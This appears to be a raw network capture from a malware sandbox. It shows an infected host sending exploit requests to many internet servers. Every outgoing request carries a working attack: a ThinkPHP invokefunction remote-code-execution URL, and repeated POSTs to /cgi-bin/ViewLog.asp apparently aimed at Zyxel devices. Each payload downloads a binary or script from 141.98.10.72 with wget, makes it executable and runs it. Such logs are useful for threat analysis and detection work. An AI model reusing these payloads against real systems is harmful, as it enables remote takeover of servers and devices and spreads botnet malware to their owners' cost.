Feb 14, 2024 09:29:56.742033005 CET	404	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:29:56 GMT Server: Apache Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
453	192.168.2.15	51720	95.216.18.101	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:56.523010969 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:56.743269920 CET	115	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
454	192.168.2.15	34672	95.217.203.251	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:56.523072004 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:56.743139982 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:29:56 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
455	192.168.2.15	34484	95.100.136.40	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:56.539232969 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:56.775530100 CET	480	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 14 Feb 2024 08:29:56 GMT Date: Wed, 14 Feb 2024 08:29:56 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 34 38 36 62 61 35 64 26 23 34 36 3b 31 37 30 37 38 39 39 33 39 36 26 23 34 36 3b 36 65 66 37 31 36 63 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.e486ba5d.1707899396.6ef716cb</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
456	192.168.2.15	51486	95.80.219.174	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:56.726003885 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:56.932348013 CET	372	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:29:56 GMT Content-Type: text/html Content-Length: 150 Connection: close strict-transport-security: max-age=31536000; includeSubDomains; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
457	192.168.2.15	49402	95.111.254.57	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:56.727571011 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:56.935697079 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:29:56 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
458	192.168.2.15	49448	95.100.51.150	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:56.731548071 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:56.941863060 CET	478	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 256 Expires: Wed, 14 Feb 2024 08:29:56 GMT Date: Wed, 14 Feb 2024 08:29:56 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 31 36 31 35 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 33 39 36 26 23 34 36 3b 61 34 64 64 39 37 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.4161502.1707899396.a4dd978</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
459	192.168.2.15	35808	95.101.188.30	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:56.736509085 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:56.951642990 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 14 Feb 2024 08:29:56 GMT Date: Wed, 14 Feb 2024 08:29:56 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 65 30 62 31 35 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 33 39 36 26 23 34 36 3b 61 61 61 30 64 30 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.3e0b1502.1707899396.aaa0d0c</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
460	192.168.2.15	52208	95.110.208.137	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:56.739664078 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:56.960674047 CET	490	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 14 Feb 2024 08:29:53 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
461	192.168.2.15	51872	95.216.123.182	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:56.764312983 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:56.989485025 CET	115	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 Data Ascii: 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
462	192.168.2.15	53598	95.0.98.88	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:56.976905107 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:57.227466106 CET	443	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:29:57 GMT Content-Type: text/html Content-Length: 150 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload; Permissions-Policy: camera=(), microphone=(), geolocation=() Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
463	192.168.2.15	59914	95.143.149.193	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:57.053015947 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:57.287772894 CET	122	IN	HTTP/1.1 400 Bad Request Date: Wed, 20 Mar 2002 01:49:23 GMT Server: cisco-IOS Accept-Ranges: none Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a Data Ascii: 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port
464	192.168.2.15	50764	31.136.99.166	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:57.180116892 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:57.817329884 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:29:59.097305059 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:01.881203890 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:07.001038074 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:17.240746021 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:39.256103039 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:31:20.215112925 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
465	192.168.2.15	42706	95.216.127.249	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:57.507595062 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:29:57.727019072 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.24.0 Date: Wed, 14 Feb 2024 08:23:22 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
466	192.168.2.15	35478	31.136.46.142	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:29:58.187196970 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:01.369204998 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
